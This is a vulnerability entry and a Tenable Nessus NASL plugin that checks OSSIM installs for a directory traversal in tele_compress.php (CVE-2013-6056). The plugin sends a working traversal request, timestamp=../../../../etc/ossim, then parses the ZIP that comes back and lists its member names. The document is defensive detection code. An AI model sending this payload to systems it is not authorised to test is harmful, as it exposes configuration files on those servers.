CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS
Percentile
64.7%
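The OSSIM install hosted on the remote host has a directory traversal vulnerability. Input to the ‘timestamp’ parameter of the ‘/ossim/ocsreports/tele_compress.php’ script is not properly sanitized, so a value containing ‘../’ sequences can point the script at a path outside its intended directory.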
A remote attacker could exploit this to download arbitrary files, subject to the privileges under which the web server operates.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration branch: runs only when 'description' is true, records the
# plugin's metadata, and exits (exit(0) below) before any request is sent.
if (description)
{
script_id(76122);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
# Advisory identifiers this check is tied to.
script_cve_id("CVE-2013-6056");
script_bugtraq_id(62899);
script_name(english:"OSSIM tele_compress.php Directory Traversal");
# The summary states that the check attempts a real retrieval, not a
# version comparison.
script_summary(english:"Tries to download the contents of /etc/ossim");
script_set_attribute(attribute:"synopsis", value:
"An application hosted on the remote web server has a directory
traversal vulnerability.");
script_set_attribute(attribute:"description", value:
"The OSSIM install hosted on the remote host has a directory traversal
vulnerability. Input to the 'timestamp' parameter of the
'/ossim/ocsreports/tele_compress.php' script is not properly
sanitized.
A remote attacker could exploit this to download arbitrary files,
subject to the privileges under which the web server operates.");
script_set_attribute(attribute:"see_also", value:"http://forums.alienvault.com/discussion/comment/9407");
# Remediation: the fixed release named by the plugin.
script_set_attribute(attribute:"solution", value:"Upgrade to OSSIM 4.3.3.1 or later.");
# Base vector: network-reachable, low complexity, no authentication;
# confidentiality is the only impacted property (C:C, I:N, A:N).
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
# Temporal vector: exploitability unproven (E:U), official fix available
# (RL:OF), report confirmed (RC:C).
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
# "No exploit is required" together with exploit_available=false: the issue
# is reached with an ordinary HTTP request, so no separate exploit is tracked.
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
# Timeline: disclosure, vendor patch, then publication of this plugin.
script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/08");
script_set_attribute(attribute:"patch_publication_date", value:"2013/10/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
# ACT_ATTACK: the check sends the traversal request to the target itself
# (see the request built after this branch), so schedule it accordingly.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Runs after the OSSIM web detection plugin and only when that plugin (and
# PHP detection) populated the listed KB keys.
script_dependencies("ossim_web_detect.nasl");
script_require_keys("www/ossim", "www/PHP");
script_require_ports("Services/www", 443);
exit(0);
}
include("audit.inc");
include("smb_func.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("bsal.inc");
include("zip.inc");
include("data_protection.inc");
# Stop immediately unless an OSSIM install was recorded in the KB.
get_kb_item_or_exit("www/ossim");

# Web port to test, defaulting to 443. php:TRUE is passed to the helper;
# presumably it restricts the check to servers with PHP support (the
# registration branch also requires the "www/PHP" KB key).
port = get_http_port(default:443, php:TRUE);

app_name = "AlienVault OSSIM";

# Install record for this port; the script exits if none is found.
install = get_install_from_kb(appname:'ossim', port:port, exit_on_fail:TRUE);

# Base URL of the install, used only in "not affected" audit messages.
report_url = build_url(port:port, qs:install['dir']+'/');

# Probe request: tele_compress.php with a 'timestamp' value that walks up
# four directories to /etc/ossim. On an affected host the response carries
# real configuration data from the target, so the response body held by the
# scanner should be treated as sensitive. For detection on the server side,
# the same signal is a request to this script whose 'timestamp' value
# contains "../" sequences.
probe_path = '/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim';
url = install['dir'] + probe_path;

res = http_send_recv3(
  method:"GET",
  item:url,
  port:port,
  exit_on_fail:TRUE
);
res_headers = parse_http_headers(status_line:res[0], headers:res[1]);

# A status other than 200 is treated as "not affected": the request was not
# valid for this install. OCS was removed in later versions, so the script
# is simply absent there.
if (res_headers['$code'] != 200)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);

# An affected server answers with a ZIP attachment. The capture group admits
# only word characters followed by ".zip", so the server-supplied file name
# that later appears in messages and the report cannot carry anything else.
disposition_re = "attachment;\s*filename=(\w+\.zip)";
disposition = eregmatch(
  string:res_headers['content-disposition'],
  pattern:disposition_re
);
if (isnull(disposition))
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);

filename = disposition[1];
# Split the response body into the leading directory name and the ZIP data
# that follows it. The split point is the first "PK" in the body.
# NOTE(review): a directory name that itself contains "PK" would be cut
# short here; not a concern for /etc/ossim, but confirm if the probed path
# ever changes.
zip_resp_body = res[2];
pk_offset = stridx(zip_resp_body, "PK");
if (pk_offset == -1)
  exit(1, "Failed to parse body of HTTP response containing " + filename + ".");

# Text before the archive: the directory the server says it compressed.
zip_dir = strip(left(zip_resp_body, pk_offset));

# Everything from "PK" onwards is handed to the ZIP parser; a parse failure
# ends the check with an error rather than a finding.
archive_bytes = right(zip_resp_body, strlen(zip_resp_body) - pk_offset);
zip_struct = zip_parse(blob:archive_bytes);
if (isnull(zip_struct))
  exit(1, "Failed to parse " + filename + " as a ZIP file.");
# Report the finding. At the lowest verbosity only the port is flagged;
# otherwise the request URL is included, and at verbosity above 1 the names
# of the archive members are listed as evidence.
if (!(report_verbosity > 0))
  security_hole(port);
else
{
  listing = NULL;

  if (report_verbosity > 1)
  {
    # zip_dir comes from the server's response and is printed as received.
    listing =
      '\nWhich returned the file ' + filename + ' containing the contents of ' +
      '\n' + zip_dir + ':' +
      '\n';

    # Only member names are listed, never file contents, and each name goes
    # through the data-protection redaction helper before it is added.
    foreach zipped_name (sort(keys(zip_struct['files'])))
      listing += '\n - ' + data_protection::sanitize_user_full_redaction(output:zipped_name);

    listing += '\n';
  }

  report_text = get_vuln_report(items:url, port:port, trailer:listing);
  security_hole(port:port, extra:report_text);
}